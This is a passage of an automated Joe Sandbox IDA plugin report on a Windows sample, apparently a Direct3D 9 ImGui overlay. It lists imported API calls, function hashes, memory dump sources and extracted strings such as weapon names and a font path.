??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B35F0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3602
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3612
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3624
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3634
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3646
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3656
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3668
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3678
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B368A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B369A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B36AC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B36BC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B36CE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B36DE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B36F0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3700
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3712
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3722
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3734
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3744
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3756
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3766
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF68B4B3779
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3789
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF68B4B379C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B37AC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B37BE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B37CE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B37E0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B37F0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3802
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3812
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3824
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3834
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF68B4B3845
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3855
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3867
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3877

Part of subcall function 00007FF68B4C7C40: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF68B4C74EA,?,?,?,00007FF68B4C7994), ref: 00007FF68B4C7CA0
Part of subcall function 00007FF68B4C7C40: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF68B4C74EA,?,?,?,00007FF68B4C7994), ref: 00007FF68B4C7CC2

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF68B4B38A5
??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF68B4B38E3
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF68B4B38ED

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V01@@$V01@_$?setstate@?$basic_ios@Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@fclosememset
String ID:
API String ID: 764698701-0
Opcode ID: a8ad4a536fd2be781a0b7dfde1e13426297cc7de96d2636cbf9a6cd93bfd7741
Instruction ID: 1b48bb3994e24ad8cdab4213265fcf56bc1145b797f5724f1ba656cce3b21c30
Opcode Fuzzy Hash: a8ad4a536fd2be781a0b7dfde1e13426297cc7de96d2636cbf9a6cd93bfd7741
Instruction Fuzzy Hash: 40E1D660A5EA8BD2EE409B21E8A64792761FF89F45F445039E85E9727ADF3CF10DC700

Function 00007FF68B4B3980 Relevance: 52.7, APIs: 35, Instructions: 151COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF68B4B39B0
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A00
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A12
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A24
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A36
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A48
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A5A
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A6C
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A7E
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A90
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AA2
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3AB4
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AC6
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AD8
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AEA
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AFC
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B0E
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B20
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B32
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B44
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B56
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B68
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B7A
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B8C
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF68B4B3B9E
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF68B4B3BB0
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3BC2
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3BD4
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3BE6
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3BF8
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3C0A
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3C1C

Part of subcall function 00007FF68B4C7C40: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF68B4C74EA,?,?,?,00007FF68B4C7994), ref: 00007FF68B4C7CA0
Part of subcall function 00007FF68B4C7C40: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF68B4C74EA,?,?,?,00007FF68B4C7994), ref: 00007FF68B4C7CC2

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF68B4B3C4A
??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF68B4B3C81
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF68B4B3C8B

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$??5?$basic_istream@V01@$??1?$basic_ios@??1?$basic_istream@?setstate@?$basic_ios@Init@?$basic_streambuf@fclosememset
String ID:
API String ID: 1635463032-0
Opcode ID: bfffe3d76a1daa96140dedc425c75a0fe6ff2fed2e86e3c0fccdb18951e11754
Instruction ID: 6a5dbd6e91574bb8075d7d6f8774fe96b4d09268c371538542a5a72c8cb08d11
Opcode Fuzzy Hash: bfffe3d76a1daa96140dedc425c75a0fe6ff2fed2e86e3c0fccdb18951e11754
Instruction Fuzzy Hash: 7E91F761A28A47D2EF50DF14E8A55A96320FF88F49F84503AE64E87579DF3CE64EC700

Function 00007FF68B486800 Relevance: 34.8, APIs: 23, Instructions: 282COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486850
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4868F3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486925
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486957
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486990
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4869C2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486A1E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486A50
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486A82
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486AB4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486AE6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486B18
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486B4A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486B88
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486BBA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486BEC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486C1E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486C62
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486CA0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486CD2
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B486CF4
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B486D02
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B486D34

Part of subcall function 00007FF68B49E9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49E9EB
Part of subcall function 00007FF68B49E9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EA0C
Part of subcall function 00007FF68B49E9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EA59
Part of subcall function 00007FF68B49E9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EA89
Part of subcall function 00007FF68B49E9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EAAE
Part of subcall function 00007FF68B49E9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EAD3
Part of subcall function 00007FF68B49E9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49EAF4

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: free$__acrt_iob_funcfclose
String ID:
API String ID: 3697265371-0
Opcode ID: b7338433da687256703d9c3e595e8385020f2be4f58e2c06e59224cc98ad95c9
Instruction ID: a7c4273a708f4d795463ee8bd56fc27f5388dd5398c098fa0f31ba5a48bcaf13
Opcode Fuzzy Hash: b7338433da687256703d9c3e595e8385020f2be4f58e2c06e59224cc98ad95c9
Instruction Fuzzy Hash: 70E11835B4AB81D6EB998F60E5911B873A4FF49B40F4D0439CA6D83365EF38B860C351

Function 00007FF68B493B00 Relevance: 29.0, APIs: 23, Instructions: 240COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493B2B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493B50
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493B75
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493B9A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493BBF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493BF1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493C16
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493C3B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493C6D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493C92
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493CC4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493CE9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493D0E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493D8A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493DAF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493DD4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493DF9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493E1E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493E43
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493E68
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493E8D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493EB2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493ED7

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 3d0d18b2d32f5ae7161202d7a3404b7747ab63f17aa8484d7db5cdba834a80bb
Instruction ID: a068df2bc2883612b9d2fbd783d6b4bc2d10039e4f8acd281dc01930547c7d55
Opcode Fuzzy Hash: 3d0d18b2d32f5ae7161202d7a3404b7747ab63f17aa8484d7db5cdba834a80bb
Instruction Fuzzy Hash: EDB1F631A4AA82D5FF558F61D5956B822A0FF4AF40F0D543DC90EC72BAEF2DA904C714

Function 00007FF68B49F050 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B482650: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B482731

fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B49F0B6
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B49F0C7
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B49F0E1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49F107
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B49F127
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B49F135
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49F150
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B49F17D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B49F323

Strings

C:\Windows\Fonts\Impact.ttf, xrefs: 00007FF68B49F085
%s, %.0fpx, xrefs: 00007FF68B49F26C

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: fclose$fseekmalloc$freadfreeftell
String ID: %s, %.0fpx$C:\Windows\Fonts\Impact.ttf
API String ID: 3453272378-2114150515
Opcode ID: 5a6492871942f2b9e1f9e70ea6d63c79368bfc33f609ff677ac7cdf6cb9ad1f0
Instruction ID: 9e0e316adf626fd516aecf5663f1c92502c628fa8afec45fe337cb8afdd9f5bd
Opcode Fuzzy Hash: 5a6492871942f2b9e1f9e70ea6d63c79368bfc33f609ff677ac7cdf6cb9ad1f0
Instruction Fuzzy Hash: 17917421908BC5C5F7128F69A8022F9B3B0FF9D759F046225EE8953678EF39E146CB00

Function 00007FF68B4BABA0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 215COMMON

Download Yara Rule

APIs

Direct3DCreate9Ex.D3D9 ref: 00007FF68B4BABBD
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BABCC
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BACA6
QueryPerformanceFrequency.KERNEL32 ref: 00007FF68B4BAD01
QueryPerformanceCounter.KERNEL32 ref: 00007FF68B4BAD16
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4BAEBC

Strings

@, xrefs: 00007FF68B4BAC82
OTTO, xrefs: 00007FF68B4BAFBE, 00007FF68B4BAFE9
imgui_impl_dx9, xrefs: 00007FF68B4BAE0A
imgui_impl_win32, xrefs: 00007FF68B4BAD2B

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: PerformanceQueryexit$CounterCreate9Direct3Frequencymalloc
String ID: @$OTTO$imgui_impl_dx9$imgui_impl_win32
API String ID: 2444153533-2332507762
Opcode ID: 48d9da6e33a340731aa1b5686689c15005319b8bc144aa1fc55e66777013b573
Instruction ID: 2578349bbb25b827a5bc67212a6c85177ca81d10a1e80eeb51a06778d83cc89f
Opcode Fuzzy Hash: 48d9da6e33a340731aa1b5686689c15005319b8bc144aa1fc55e66777013b573
Instruction Fuzzy Hash: 2DD15572A08B81CAE3218F25E8453A977B4FF58308F184128DB9C8767ADF7DE065CB01

Function 00007FF68B4BB080 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4B27C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B28B1

memchr.VCRUNTIME140 ref: 00007FF68B4BB125
memchr.VCRUNTIME140 ref: 00007FF68B4BB153
memchr.VCRUNTIME140 ref: 00007FF68B4BB183
memchr.VCRUNTIME140 ref: 00007FF68B4BB1B4
memchr.VCRUNTIME140 ref: 00007FF68B4BB1E8
memchr.VCRUNTIME140 ref: 00007FF68B4BB214
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BB290

Strings

Shotgun, xrefs: 00007FF68B4BB0C9
Snip, xrefs: 00007FF68B4BB1F2
Rifl, xrefs: 00007FF68B4BB190

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

